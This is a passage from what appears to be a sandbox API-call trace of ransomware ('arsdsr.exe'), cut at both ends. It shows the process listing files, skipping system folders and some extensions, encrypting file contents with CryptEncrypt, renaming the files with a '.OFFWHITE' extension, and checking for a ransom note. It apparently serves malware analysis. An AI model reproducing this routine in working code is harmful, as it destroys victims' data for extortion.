RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0087.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.844] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0087.844] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.844] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.844] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0087.845] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xaec3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.845] SetLastError (dwErrCode=0x0) [0087.845] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.847] GetLastError () returned 0x0 [0087.847] GetLastError () returned 0x0 [0087.847] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xaed3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.847] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.847] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xaee3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.847] WriteFile (in: hFile=0x21c, lpBuffer=0x547d98*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547d98*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0087.847] GetProcessHeap () returned 0x500000 [0087.848] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xaec3a) returned 0x2960020 [0087.848] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.848] ReadFile (in: hFile=0x21c, lpBuffer=0x2960020, nNumberOfBytesToRead=0xaec3a, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesRead=0x295e540*=0xaec3a, lpOverlapped=0x0) returned 1 [0087.923] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.924] WriteFile (in: hFile=0x21c, lpBuffer=0x2960020*, nNumberOfBytesToWrite=0xaec3a, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x2960020*, lpNumberOfBytesWritten=0x295e54c*=0xaec3a, lpOverlapped=0x0) returned 1 [0087.927] GetProcessHeap () returned 0x500000 [0087.927] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2960020 | out: hHeap=0x500000) returned 1 [0087.932] CloseHandle (hObject=0x21c) returned 1 [0087.941] GetProcessHeap () returned 0x500000 [0087.941] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0087.941] GetProcessHeap () returned 0x500000 [0087.941] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0087.941] GetProcessHeap () returned 0x500000 [0087.941] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0087.941] GetProcessHeap () returned 0x500000 [0087.941] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0087.941] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" [0087.941] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.OFFWHITE") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.OFFWHITE" [0087.941] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.OFFWHITE" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.offwhite")) returned 1 [0087.942] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb7e7af0, ftCreationTime.dwHighDateTime=0x1cb04a9, ftLastAccessTime.dwLowDateTime=0xeb7e7af0, ftLastAccessTime.dwHighDateTime=0x1cb04a9, ftLastWriteTime.dwLowDateTime=0x49c691c0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x150578, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="setup.exe", cAlternateFileName="")) returned 1 [0087.942] lstrcmpiW (lpString1="setup.exe", lpString2=".") returned 1 [0087.942] lstrcmpiW (lpString1="setup.exe", lpString2="..") returned 1 [0087.942] lstrcmpiW (lpString1="setup.exe", lpString2="...") returned 1 [0087.942] lstrcmpiW (lpString1="setup.exe", lpString2="windows") returned -1 [0087.942] lstrcmpiW (lpString1="setup.exe", lpString2="$recycle.bin") returned 1 [0087.942] lstrcmpiW (lpString1="setup.exe", lpString2="rsa") returned 1 [0087.942] lstrcmpiW (lpString1="setup.exe", lpString2="ntuser.dat") returned 1 [0087.942] lstrcmpiW (lpString1="setup.exe", lpString2="programdata") returned 1 [0087.942] lstrcmpiW (lpString1="setup.exe", lpString2="appdata") returned 1 [0087.942] lstrcmpiW (lpString1="setup.exe", lpString2="program files") returned 1 [0087.943] lstrcmpiW (lpString1="setup.exe", lpString2="program files (x86)") returned 1 [0087.943] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.943] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="setup.exe" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" [0087.943] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.943] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.943] PathFindExtensionW (pszPath="setup.exe") returned=".exe" [0087.943] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0087.943] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80aa51d0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80aa51d0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x4a6d3200, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x5061, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0087.943] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0087.943] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0087.943] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0087.943] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0087.943] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0087.943] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0087.943] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0087.943] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0087.943] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0087.943] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0087.943] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0087.943] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.943] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" [0087.943] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.943] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.943] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0087.943] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0087.943] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0087.944] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0087.944] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0087.944] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0087.944] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0087.944] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0087.944] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0087.944] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0087.944] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0087.944] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0087.944] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0087.944] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0087.944] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0087.944] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0087.944] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0087.944] GetProcessHeap () returned 0x500000 [0087.944] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547da8 [0087.944] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0087.944] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=20577) returned 1 [0087.978] GetProcessHeap () returned 0x500000 [0087.978] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0087.978] GetProcessHeap () returned 0x500000 [0087.978] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0087.978] GetProcessHeap () returned 0x500000 [0087.978] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0087.978] GetProcessHeap () returned 0x500000 [0087.979] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0087.979] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.979] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.979] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0087.979] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.979] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.979] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0087.979] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.979] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.979] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0087.979] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.979] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.979] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0087.980] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5061, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.980] SetLastError (dwErrCode=0x0) [0087.980] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.985] GetLastError () returned 0x0 [0087.985] GetLastError () returned 0x0 [0087.985] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5161, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.986] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0087.986] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5261, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.986] WriteFile (in: hFile=0x21c, lpBuffer=0x547da8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547da8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0087.986] GetProcessHeap () returned 0x500000 [0087.986] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5061) returned 0x5557b0 [0087.986] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.986] ReadFile (in: hFile=0x21c, lpBuffer=0x5557b0, nNumberOfBytesToRead=0x5061, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesRead=0x295e540*=0x5061, lpOverlapped=0x0) returned 1 [0087.989] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0087.989] WriteFile (in: hFile=0x21c, lpBuffer=0x5557b0*, nNumberOfBytesToWrite=0x5061, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5557b0*, lpNumberOfBytesWritten=0x295e54c*=0x5061, lpOverlapped=0x0) returned 1 [0087.989] GetProcessHeap () returned 0x500000 [0087.989] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5557b0 | out: hHeap=0x500000) returned 1 [0087.989] CloseHandle (hObject=0x21c) returned 1 [0087.991] GetProcessHeap () returned 0x500000 [0087.991] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0087.991] GetProcessHeap () returned 0x500000 [0087.991] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0087.991] GetProcessHeap () returned 0x500000 [0087.991] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0087.991] GetProcessHeap () returned 0x500000 [0087.991] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0087.991] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" [0087.991] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0087.991] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0087.992] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x749b0240, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x749b0240, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x46a46a30, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb9fa2f7, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="VisiorWW.cab", cAlternateFileName="")) returned 1 [0087.992] lstrcmpiW (lpString1="VisiorWW.cab", lpString2=".") returned 1 [0087.992] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="..") returned 1 [0087.992] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="...") returned 1 [0087.992] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="windows") returned -1 [0087.993] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="$recycle.bin") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="rsa") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="ntuser.dat") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="programdata") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="appdata") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="program files") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="program files (x86)") returned 1 [0087.993] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.993] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="VisiorWW.cab" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" [0087.993] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.993] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.993] PathFindExtensionW (pszPath="VisiorWW.cab") returned=".cab" [0087.993] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0087.993] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0087.993] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0087.993] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80711960, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80711960, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468ee660, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0xb80800, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="VisiorWW.msi", cAlternateFileName="")) returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.msi", lpString2=".") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="..") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="...") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="windows") returned -1 [0087.993] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="$recycle.bin") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="rsa") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="ntuser.dat") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="programdata") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="appdata") returned 1 [0087.993] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="program files") returned 1 [0087.994] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="program files (x86)") returned 1 [0087.994] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.994] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="VisiorWW.msi" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi" [0087.994] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.994] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.994] PathFindExtensionW (pszPath="VisiorWW.msi") returned=".msi" [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0087.994] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0087.994] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80b17dc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80b17dc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0x468a2b70, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x2213, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="VisiorWW.xml", cAlternateFileName="")) returned 1 [0087.994] lstrcmpiW (lpString1="VisiorWW.xml", lpString2=".") returned 1 [0087.994] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="..") returned 1 [0087.994] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="...") returned 1 [0087.994] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="windows") returned -1 [0087.994] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="$recycle.bin") returned 1 [0087.995] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="rsa") returned 1 [0087.995] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="ntuser.dat") returned 1 [0087.995] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="programdata") returned 1 [0087.995] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="appdata") returned 1 [0087.995] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="program files") returned 1 [0087.995] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="program files (x86)") returned 1 [0087.995] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\" [0087.995] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\", lpString2="VisiorWW.xml" | out: lpString1="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned="C:/MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml" [0087.995] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0087.995] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0087.995] PathFindExtensionW (pszPath="VisiorWW.xml") returned=".xml" [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0087.995] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0087.995] 